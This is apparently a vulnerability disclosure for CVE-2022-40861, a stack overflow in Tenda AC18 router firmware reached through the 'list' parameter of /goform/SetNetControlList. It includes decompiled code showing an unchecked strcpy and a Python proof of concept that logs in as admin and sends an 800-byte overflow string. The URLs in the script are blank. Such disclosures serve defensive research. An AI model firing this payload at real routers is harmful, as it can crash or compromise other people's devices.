CVE-2022-40861: Router-vuls/formSetQosBand.md at main · CPSeek/Router-vuls
Tenda AC18 router V15.03.05.19 contains a stack overflow vulnerability in the formSetQosBand->FUN_0007db78 function with the request /goform/SetNetControlList/
Tenda AC18 stack overflow vulnerability***** Version
V15.03.05.19_multi (ac18_kf_V15.03.05.19(6318_)_cn.bin)
* Firmware
* Vulnerability Detail
In function formSetQosBand->FUN_0007db78, the content obtained by the program from the parameter “list” is passed to local_18, and then the local_18 as param_1 is passed to function FUN_0007dd20, then param_1 (local_14) is directly copied into the local_264 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
void formSetQosBand(undefined4 param_1) {
local_18 = FUN_0002ba8c(param_1,"list",&DAT_000e250c); FUN_0007dd20(local_18,"bandwidth.mode",L’\n’); local_5c = 0; … }
undefined4 FUN_0007db78(char *param_1,undefined4 param_2,byte param_3) { int iVar1;
char *local_20; int local_1c; int local_18; char *local_14;
memset(auStack100,0,0x40); memset(auStack356,0,0x100); memset(local_264,0,0x100);
memset(auStack1964,0,0x100); local_18 = 0; local_1c = 0; FUN_0007db3c(); local_14 = param_1; do { while( true ) { local_20 = strchr(local_14,(uint)param_3); if (local_20 == (char *)0x0) goto LAB_0007e0a0; local_1c = 0; *local_20 = '\0’; local_20 = local_20 + 1; memset(local_264,0,0x100); strcpy(local_264,local_14); //here is overflow if (local_264[0] == ‘;’) { sscanf(local_264,";%[^;];%[^;];%[^;];%[^;];",&local_26c,&local_28c,&local_6ac,&local_69c); } else { sscanf(local_264,"%[^\r]\r%[^\r]\r%[^\r]\r%s",auStack1964,&local_28c,&local_6ac,&local_69c); local_1c = 1; }
import requests
cmd = b’list=AAAAAAAAAAAA\n’ + b’A’ * 800
url = b"" payload = b"" + cmd
data = { "username": "admin", "password": "admin", }
def attack(): s = requests.session() resp = s.post(url=url, data=data) print(resp.content) resp = s.post(url=payload, data=data) print(resp.content)